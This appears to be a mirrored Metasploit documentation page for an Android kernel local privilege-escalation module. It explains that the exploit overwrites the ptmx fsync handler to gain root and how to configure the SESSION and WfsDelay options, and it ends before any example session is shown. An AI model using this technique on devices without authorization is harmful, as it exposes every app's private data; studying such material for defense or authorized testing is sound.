CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/exploit/android/local/put_user_vroot.md
Views: 1904
Introduction
This modules exploits a vulnerability in the linux kernel on an Android device, which allows an untrusted app to elevate to root privileges. On Android an application normally runs as an individual linux user, sandboxing it from the Android system and other applications. After running the exploit the resulting session has full privileges on the device, and can access the entire filesystem and the private data files of every other app, including system apps.
The exploit uses a read kernel memory primitive to first figure out the correct offsets for the device, before using the write primitive to overwrite the ptmx.fsync handler to a function that will elevate the current process to root. Finally /dev/ptmx is opened, and fsync called to trigger the exploit.
This exploit should work on any vulnerable device and is not device specific. In the example below a Samsung Galaxy S4 running Android version 4.3 was targeted.
Usage
You'll first need to obtain a session on the target device. Once the module is loaded, one simply needs to set the SESSION option and configure the handler. The exploit can take a while to run on the device so it is configured with WfsDelay option to wait 120 seconds for a session. If you have not had a session after this time you can assume the device is not vulnerable.
An example session follows: